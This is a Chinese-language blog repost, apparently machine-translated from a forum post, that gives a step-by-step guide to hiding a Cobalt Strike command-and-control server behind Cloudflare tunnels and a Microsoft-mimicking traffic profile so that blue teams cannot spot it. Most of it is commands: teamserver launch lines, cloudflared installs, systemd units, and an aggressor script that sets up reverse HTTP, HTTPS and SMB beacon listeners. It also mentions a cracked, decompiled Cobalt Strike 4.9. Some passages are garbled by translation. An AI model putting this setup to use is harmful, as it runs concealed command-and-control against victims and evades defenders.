隐藏 Cobalt Strike PRO

admin 2024年7月30日15:28:35评论104 views字数 7347阅读24分29秒阅读模式

隐藏 Cobalt Strike PRO

隐藏 Cobalt Strike PRO

隐藏 CobaltStrike PRO使用CloudFlared Tunnel和Microsoft 100 Traffic%隐藏您的CobaltStrike 终于在这里看到了新的CobaltStrike观众(祝大家好运),我还在等管理员允许我们发布上一次比赛中关于CS的一些材料。这样,这里的所有人都可以学会如何正确使用它;现在我们必须专注于在使用此工具时尽可能地隐藏自己,使其复杂化并像专业人士一样连接!

Cobaltstrike 4.9末尾附带的源代码是反编译的cs4.9。其中有很多洞,主要是由于反编译代码中的语法错误导致编译错误的问题。手动更改了大部分反编译导致的语法错误。一小部分位置代码更改比较复杂,直接进行注释处理,调用原始jar函数实现,这并不影响功能的使用。如果要在第二次打开时更改位置,可以取消注释并更改位置代码以实现第二次打开。

-XX:+AggressiveHeap -XX:+UseParallelGC -javaagent:hook.jar

隐藏 Cobalt Strike PRO

隐藏 Cobalt Strike PRO

隐藏 Cobalt Strike PRO

隐藏 Cobalt Strike PRO

现在我将有两种方法可以像专业人士一样隐藏你的信标(c2);这是隐藏你的(c2)功能的最后一次使用,并混合你的流量,这样就更难捕获你的 c2,其次,了解这一点很重要,并不是所有开始使用 CS 的人都知道使用哪种工具可以让自己免受 wireshark 和蓝队的攻击。;
一般来说,要使用帝国来处理(c2);或者 c2,你需要这 3 个重要的东西;
  • 个人资料 – 例如:google.com、Amazon、microsoft.com 等。
  • 您的 IP/主机/域名
  • 灯塔上线了!
Argo 隧道客户端:
包含 Argo 隧道的命令行客户端,Argo 隧道是一个通过 Cloudflare 网络代理任何本地 Web 服务器的隧道守护程序。您可以在 Cloudflare 文档的“Argo Tunnel”部分找到大量文档。
开始之前:
在使用 Argo 隧道之前,您需要在 Cloudflare 仪表板上执行几个步骤。您添加到 Cloudflare 的网站将用于将流量路由到您的隧道。
https://support.cloudflare.com/hc/en-us/articles/201720164-Creating-a-Cloudflare-account-and-adding-a-website

让我们来看看使用域名重定向器等隐藏信标的所有旧技术。现在我们将发布如何让您的信标“一文不值”!

我们需要完成这3件隐藏的事情;

  • cloudflare – 隧道

  • ding argo –

  • cobalt strike 4.x 互联网渗透工具

./teamserver.sh ip-адрес  microsoft.profile

隐藏 Cobalt Strike PRO

我们的枪已装好弹药,正在使用 Microsoft.profile 监听我们的动静

隐藏 Cobalt Strike PRO

安装 cloudflare 也和你想象的一样简单!要安装 .deb 包,只需运行;Debian / Ubuntu

// Ubuntu、Linux Mint

wget -q https://github.com/cloudflare/cloudflared/releases/latest/download/cloudflared-linux-amd64.debdpkg -i cloudflared-linux-amd64.debcloudflared status

// CentOS、Fedora、RHEL

wget -q https://bin.equinox.io/c/VdrWdbjqyF/cloudflared-stable-linux-amd64.rpmrpm -ivh cloudflared-stable-linux-amd64.rpm

//docker

https://hub.docker.com/r/cloudflare/cloudflareddocker run cloudflare/cloudflared:2020.7.0 tunnel --no-autoupdate --hello-world

// 苹果系统

$ brew install cloudflare/cloudflare/cloudflared
cloudflared tunnel --url 127.0.0.1:31337

cloudflare 现在已经完成了我们私人钴攻击隧道的任务;(https://assisted-same-*.trycloudflare.com );让我们映射我们的内部端口来捕获目标;

./ding -config=./ding.cfg -subdomain= 31337

适用于 Windows/Linux/Mac OS 的 bing

https://github.com/open-dingtalk/pierced/tree/master/linux

现在是重要的部分;我们在这里用 cloudflare 监听器所做的事情,我们需要用你的 ding 或任何其他映射工具来做;让我们获取 cloudflare 地址并准备我们的隧道;

现在为 cloudflared IP 地址和内部端口 31337 配置监听器

隐藏 Cobalt Strike PRO

让我们将信标连接到网络!

隐藏 Cobalt Strike PRO

在线的!

隐藏 Cobalt Strike PRO

现在不要忘记,我们的信标是结合在 cloudflare 隧道和 C2concealer 配置文件(Microsoft)之间的,它将向客户端显示我们位于 cloudflare 的 IP 地址,而 wireshark 隧道显示微软;据您想象,在东方准备 C2concealer 配置文件;

只需按照此处的 repo https://github.com/FortyNorthSecurity/C2concealer 或运行以下命令;

C2 concealer 是一个 python 3 命令行工具,可创建灵活的 c2 配置文件以供 Cobalt Strike 使用,您想快速启动并运行吗?

使用示例:

Usage:$ c2concealer --hostname google.com --variant 3Flags:(optional)--hostnameThe hostname used in HTTP client and server side settings. Default is None.--variantAn integer defining the number of HTTP client/server variants to generate. Recommend between 1 and 5. Max 10.

输出到控制台:

git clone https://github.com/FortyNorthSecurity/C2concealerchmod u+x install.sh./install.sh

您需要选择 SSL 选项。首次运行该工具时,只需选择“4”即可了解该工具的工作原理。选项“2”要求您为您管理的域设置 A 记录,并将其指向您正在运行该工具的计算机的 IP 地址。这是因为该工具将下载 certbot 并使用 LetsEncrypt 自动启动 ACME 协议来创建用于即时评估的证书。选项“3”需要密钥库的路径(您可以在选项卡上填写此路径)。

选择 SSL 选项后,该工具应该简单地输出验证结果并将配置文件保存在当前工作目录中。

配置c2concealer:

  • 使用此工具的最佳方法是通过向默认字典和数据列表添加附加值和/或其他值使其成为您自己的工具。

  • 该工具的结构允许用户在多个位置更改默认数据属性。首先,您会在 /c2concealer/data/ subdirectory.py 中找到几个文件,其中包含默认值的列表和词典。跳转到那里并更改您认为合适的任何内容。

dns.py (setting up dns subdomains)file_type_prepend.py (customize the appearance of the http get server responses... it's also the c2 management instructions)params.py (two dictionaries containing common parameter names and a common list of words)post_ex.py (the list of spawn_to processes...definitely change this one)reg_headers.py (typical http headers such as user agent and server)smb.py (smb channel names to use when sending messages via SMS)stage.py (data for changing locks related to the scene)transform.py (transformations payload data...no need to change this)urls.py (the file types and URL path components used to create URLs throughout the tool...definitely change that)

其次,

您可以在配置文件创建过程中自定义各种属性。例如,在文件“/c2concealer/components/stageblock.py”中,您可以更改 PE 图像大小值的范围(大约第 73-74 行)。请查看组件目录中的所有不同文件。

如果我不想添加自己的值怎么办?

一切都井然有序。它每次仍会生成随机配置文件。最终,AV 供应商可以浏览存储库并根据这些默认值创建签名,但目前你应该没问题。

对于让我们使用 microsoft.com 网络活动加密免费 SSL 以悄悄隐藏我们的 c2 主机,最佳选项 #2。

将 Cobalstrike Teamserver 作为服务启动

这些脚本可用作将团队服务器配置为服务和自动运行监听器的模板。

这些场景已在 Ubuntu 服务器上进行了测试,需要根据您的使用情况进行调整。

对于 cloudflare;我们需要创建此文件以在重启时自动启动服务:

请务必根据您的环境更新服务文件。

将服务文件复制到您团队的服务器,并根据您的服务器指定修复位置;

  • teamserver.service

  • listener.service

  • listener_service.cna

  • cloudflared.service

  • cloudflared

/etc/systemd/system/teamserver.service/etc/systemd/system/listener.service/etc/systemd/system/cloudflared.service/etc/your-cobaltstrike-location/listener_service.cna/etc/default/cloudflared

sudo nano /etc/default/cloudflared

COBALTSTRIKE_DSAS_INJECT.DEV=--port 5353 --upstream https://1.1.1.1/dns-query --upstream https://1.0.0.1/dns-query

sudo nano /etc/systemd/system/cloudflared.service

[Unit]Description=cloudflared DNS over HTTPS proxyAfter=syslog.target network-online.target[Service]Type=simpleUser=cloudflaredEnvironmentFile=/etc/default/cloudflaredExecStart=/usr/local/bin/cloudflared proxy-dns $COBALTSTRIKE_DSAS_INJECT.DEVRestart=on-failureRestartSec=10KillMode=process[Install]WantedBy=multi-user.target

启用 systemd 服务在启动时运行,然后启动该服务并检查其状态:

注册新服务

systemclt daemon-reload

启动服务

ystemctl start teamserver.servicesystemctl start listener.servicesystemctl start cloudflared.service

检查服务

sudo systemctl enable cloudflaredsudo systemctl status cloudflared sudo systemctl status teamserver.service

// 团队服务器服务

更新设置以适合您的环境。

工作目录:安装在 cobalt strike 目录中

ExecStart:设置您的值

# teamserver.service[Unit]Description=Cobalt Strike Teamserver Service & Argo tunnel service! After=network.targetWants=network.target[Service]Type=SimpleWorkingDirectory=/your-cobaltstrike-locationExecStart=/opt/your-cobaltstrike-location/teamserver <TEAMSERVER IP> <PASSWORD> <PATH TO C2 PROFILE># Example# ExecStart=/opt/your-cobaltstrike-location/teamserver hostname -I thisismypassword /opt/cobaltstrike/c2.profile[Install]WantedBy=multi-user.target

聆听服务

更新设置以适合您的环境。

工作目录:安装在 cobalt strike 目录中

ExecStart:设置您的值

# listener.service[Unit]Description=Cobalt Strike aggressor service & argo Tunnel service!After=teamserver.service network.targetWants=teamserver.serviceStartLimitIntervalSec=33[Service]Restart=on-failureRestartSec=10WorkingDirectory=/your-cobaltstrike-locationExecStartPre=/bin/sleep 60ExecStart=/bin/bash /opt/your-cobaltstrike-location/agscript 127.0.0.1 50050 <USER to LOGON TO COBALTSTRIKE> <TEAMSERVER PASSWORD> <PATH TO listener_service.cna># Example# ExecStart=/bin/bash /opt/your-cobaltstrike-location/agscript 127.0.0.1 50050 listener_service thisismypassword /opt/cobaltstrike/listener_service.cna[Install]WantedBy=multi-user.target

无头侵略者的情景

这应该被更新以反映您的环境。

此攻击者脚本示例用于启动 HTTP、HTTPS 和 SMB 侦听器以及所有必要参数

HTTP 侦听器

  • Name

  • Listening host

  • althost

HTTP 侦听器

  • Name

  • Listening host

  • althost

println("################################################################### CobaltStrike Aggressor Script          Author:      Joe Vest Description: Headless script to create listeners###################################################################");println('Loading listener_service.cna...');on ready{    println('listener_service.cna: Creating HTTP Listener...');    listener_create_ext("HTTP", "windows/beacon_http/reverse_http", %(host => "iheartredteams.com", port => 80, beacons => "iheartredteams.com", althost => "iheartredteams.com", bindto => 80));    println('listener_service.cna: Creating HTTPS Listener...');    listener_create_ext("HTTPS", "windows/beacon_https/reverse_https", %(host => "iheartredteams.com", port => 443, beacons => "iheartredteams.com", althost => "iheartredteams.com", bindto => 443));    println('listener_service.cna: Creating SMB Listener...');    listener_create_ext("SMB", "windows/beacon_bind_pipe", %(port => "mojo.5887.8051.34782273429370473##"));    sleep(10000);}
https://blog.injectexp.dev/hide-cobaltstrike-pro/02/cobaltstrike/

原文始发于微信公众号(Ots安全):隐藏 Cobalt Strike PRO

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年7月30日15:28:35
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   隐藏 Cobalt Strike PROhttps://cn-sec.com/archives/3014809.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息